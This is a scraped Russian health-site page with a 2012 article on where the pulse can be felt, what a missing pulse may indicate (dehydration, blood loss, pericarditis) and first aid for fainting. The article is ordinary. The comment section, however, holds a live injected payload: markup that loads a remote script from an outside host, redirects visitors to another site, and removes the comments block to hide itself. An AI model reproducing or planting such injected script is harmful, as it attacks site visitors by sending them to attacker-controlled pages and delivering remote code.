Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Держать руку на пульсе  >>  Держать руку на пульсе
 
Обратная связь
 

Держать руку на пульсе

Размер шрифта
02 марта 2012 10:00
  • google_analytics: false
  • Нравится

Вы знаете, где нащупывается пульс? Отсутствие пульса – всегда крайне серьезный симптом, который требует срочного обращения за помощью к медицинским специалистам. Обращение к врачу обязательно даже тогда, когда пульс не прощупывается только в одном месте.

1 

Биение пульса – это сокращение человеческого сердца, которое происходит следующим образом: левый желудочек сокращается и выбрасывает кровь в аорту. На мгновение аорта эластично расширяется, а затем сжимается, отправляя поток крови от сердца во все органы. Эту волну мы и нащупываем в качестве пульса.

Где можно нащупать пульс:

  • На внутренней стороне запястья (лучевая артерия)
  • На передней поверхности шеи (сонная артерия)
  • На висках (височная артерия)
  • В подмышках (подмышечная артерия)
  • В локтевом сгибе (плечевая артерия)
  • В паховой складке (бедренная артерия)
  • Под коленкой (подколенная артерия)
  • На подъеме стопы (тыльная артерия стопы)
  • На внутренней лодыжке (задняя большеберцовая артерия)

Пульс на сонной артерии можно прощупать даже тогда, когда на запястье он не ощущается из-за низкого давления. Поэтому в тяжелых случаях пульс ищут именно на шее. Еще одно надежное место, где всегда будет прощупываться пульс – паховая область. У худых людей можно в центре живота нащупать пульсацию брюшной аорты.

О чем говорит отсутствие пульса?

Отсутствие пульса в любой точке тела – важный диагностический признак и может говорить о выраженном атеросклерозе сосудов нижних конечностей. Эта болезнь часто встречается у курильщиков и диабетиков. Опасна она тем, что может привести к ампутации. Прощупывая пульс, врач судит не только о работе сердца, но и о состоянии сосудов.

Как уже было сказано выше, пульсовая волна расходится от сердца во все стороны. В норме количество пульсовых толчков соответствует количеству сокращений сердца. И частота пульса одинакова везде, где бы его ни нащупали. А все потому, что сердце у нас одно. Именно оно – источник пульса.

Причины отсутствия пульса

  1. Обезвоживание.

Пульс при обезвоживании настолько слабый, что его сложно прощупать. Подобная ситуация возможна при злоупотреблении мочегонными, а также при длительных поносах. Сильное обезвоживание случается и во время жары, когда люди теряют влагу с потом. Особенно опасно обезвоживание у детей: оно смертельно при потере 10% жидкости. Если у ребенка понос, обязательно компенсируйте потерю жидкости. От обезвоживания спасет обильное питье: не меньше 2 литров воды в день.

  1. Кровопотеря.

Другая причина падения артериального давления – кровопотеря. Если на внешнее кровотечение нельзя не обратить внимание, то внутреннее, бывает, замечают слишком поздно. Такие кровотечения происходят в полости организма и могут привести к смертельному исходу.

  1. Слабая насосная функция сердца.

Наполнение сердца может снизиться при перикардите, когда полости сердца не могут расшириться, наполниться кровью и сжаться, чтобы сделать толчок.

Сердечная сорочка (перикард) облегает сердце со всех сторон наподобие сумки. Жидкость в сердечной сумке играет роль смазки. Но при воспалении жидкости этой становится намного больше, до 2 литров. Сердце в таком случае сдавлено жидкостью и не способно расслабиться и наполниться кровью. По этой причине пропадает пульс.

Первая помощь при обмороках: положить человека и приподнять ноги, чтобы кровь от ног быстрей вернулась к сердцу и головному мозгу.



Cюжеты по теме:
Пульс. О чем говорит его молчание

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:52

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Слайдшоу

Проверь свои сосуды: сохрани жизнь Как дышать правильно
Вся правда об аритмии    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.